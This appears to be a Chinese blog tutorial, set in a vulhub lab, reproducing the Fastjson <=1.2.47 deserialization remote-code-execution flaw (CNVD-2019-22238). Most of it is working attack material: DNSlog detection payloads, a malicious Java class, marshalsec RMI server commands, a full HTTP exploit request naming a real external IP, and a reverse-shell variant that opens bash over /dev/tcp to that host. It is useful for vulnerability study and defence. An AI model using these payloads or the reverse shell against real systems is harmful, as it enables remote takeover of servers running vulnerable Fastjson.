fastjson jar包_Fastjsonlt;=1.2.47反序列化RCE漏洞(CNVD201922238)
Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)?
一、漏洞描述?
Fastjson 是阿里巴巴的開源JSON解析庫,它可以解析 JSON 格式的字符串,支持將 Java Bean 序列 化為 JSON 字符串,也可以從 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允許用戶在反序列化數據中通過“@type”指定反序列化的類型,其 次,Fastjson自定義的反序列化機制時會調用指定類中的setter方法及部分getter方法,那么當組件 開啟了autotype功能并且反序列化不可信數據時,攻擊者可以構造數據,使目標應用的代碼執行流 程進入特定類的特定setter或者getter方法中,若指定類的指定方法中有可被惡意利用的邏輯(也 就是通常所指的“Gadget”),則會造成一些嚴重的安全問題。并且在Fastjson 1.2.47及以下版本 中,利用其緩存機制可實現對未開啟autotype功能的繞過。?
二、影響版本
Fastjson1.2.47以及之前的所有版本
三、環境搭建
vulhub靶場,進入fastjson漏洞環境目錄下,執行
cd 1.2.47‐rce/ docker‐compose up ‐d四、漏洞檢測
后臺回復FastJson獲取下圖工具手動檢測:
{"a":{"@type":"java.net.Inet4Address","val":"dnslog"}}{"a":{"@type":"java.net.Inet6Address","val":"dnslog"}}{"a":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}{"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}}{"a":{"@type":"java.net.URL","val":"dnslog"}}五、漏洞復現
1、編譯上傳TouchFile.class
這里的TouchFile是要編譯好的惡意類,將編譯好的TouchFile.class放在tomcat webapps/ROOT 目錄下,java源碼如下
import java.lang.Runtime; import java.lang.Process;public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/tmp/success"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }2、編譯需要使用java環境,安裝步驟如下
sudo?apt‐get?update?#更新軟件包列表sudo?apt?install?default‐jre?#安裝默認jre?java?‐version?#查看java版本javac TouchFile.java #編譯為TouchFile.class
3、安裝docker 拉起tomcat
curl ‐s https://get.docker.com/ | shcurl ‐s https://bootstrap.pypa.io/get‐pip.py | pythonpip install docker‐composedocker search tomcat #搜索鏡像(默認去Docker Hub查找)docker pull tomcat:8.0.52 #指定版本拉取tomcatdocker images #拉取成功查看拉取的鏡像docker run ‐‐name ytomcat ‐d ‐p 8081:8080 tomcat:8.0.52 #根據鏡像啟動一個容器4、宿主機向Docker容器傳送文件
docker cp 本地文件的路徑 container_id:<docker容器內的路徑>docker cp /root/TouchFile.class 5eff9f38e0c7:/usr/local/tomcat/webapps/ROOT #例子mkdir TouchFile #創建TouchFile目錄mv?TouchFile.class?TouchFile?#將TouchFile.class剪切到TouchFile目錄里將exp.class上傳至你的web服務器,地址為http://yours_ip/exp/TouchFile.class。?
我的地址為:http://8.210.235.249/TouchFile/TouchFile.class
5、借助marshalsec項目,快速開啟rmi或ldap服務
apt install git #安裝gitgit clone https://github.com/mbechler/marshalsec #下載marshalsecapt install maven #下載maven,使用maven進行編譯jar包cd marshalsecmvn clean package ‐DskipTests啟動一個RMI服務器,監聽9988端口,并制定加載遠程類TouchFile.class:
cd target java ‐cp marshalsec‐0.0.3‐SNAPSHOT‐all.jar marshalsec.jndi.RMIRefServer "ht tp://8.210.235.249/#TouchFile" 99886、發送Payload
POST / HTTP/1.1Host: your‐ip:8090Accept‐Encoding: gzip, deflateAccept: */*Accept‐Language: enUser‐Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent‐Type: application/jsonContent‐Length: 160{????"a":{????????"@type":"java.lang.Class",?????? "val":"com.sun.rowset.JdbcRowSetImpl"?????},???? "b":{?????????"@type":"com.sun.rowset.JdbcRowSetImpl",?????????"dataSourceName":"rmi://8.210.235.249/exp"?????????"autoCommit":true?????}}?
至此漏洞復現成功
六、反彈shell
import java.lang.Runtime;import java.lang.Process;public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","‐c","bash ‐i >& /dev/tcp/8.21 0.235.249/6666 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } }}和前邊同理:編譯‐‐>將TouchFile.class上傳至web服務器‐‐>啟動RMI服務器監聽端口‐‐>nc 監聽端口‐‐ >burpsuite發送Payload
相關文章
Fastjson‐CNVD‐2017‐02833
總結
以上是生活随笔為你收集整理的fastjson jar包_Fastjsonlt;=1.2.47反序列化RCE漏洞(CNVD201922238)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python实现第一个web_我的第一个
- 下一篇: java 调用htm中js函数_Lua中